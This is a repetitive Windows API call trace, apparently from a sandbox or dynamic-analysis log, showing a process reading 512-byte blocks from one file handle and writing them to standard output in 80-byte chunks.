_get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, 
lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] GetFileType (hFile=0x4c) returned 0x1 [0094.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.169] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.170] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.170] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] GetFileType (hFile=0x4c) returned 0x1 [0094.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.170] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] WriteFile (in: hFile=0x4c, 
lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.249] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.249] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] GetFileType (hFile=0x4c) returned 0x1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.249] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.250] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.250] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, 
lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] GetFileType (hFile=0x4c) returned 0x1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.250] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 
| out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.251] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.251] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.251] GetFileType (hFile=0x4c) returned 0x1 [0094.251] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.251] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.252] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.252] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] GetFileType (hFile=0x4c) returned 0x1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.252] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 
[0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.253] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.253] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, 
lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] GetFileType (hFile=0x4c) returned 0x1 [0094.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.253] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.254] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.254] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType (hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] GetFileType 
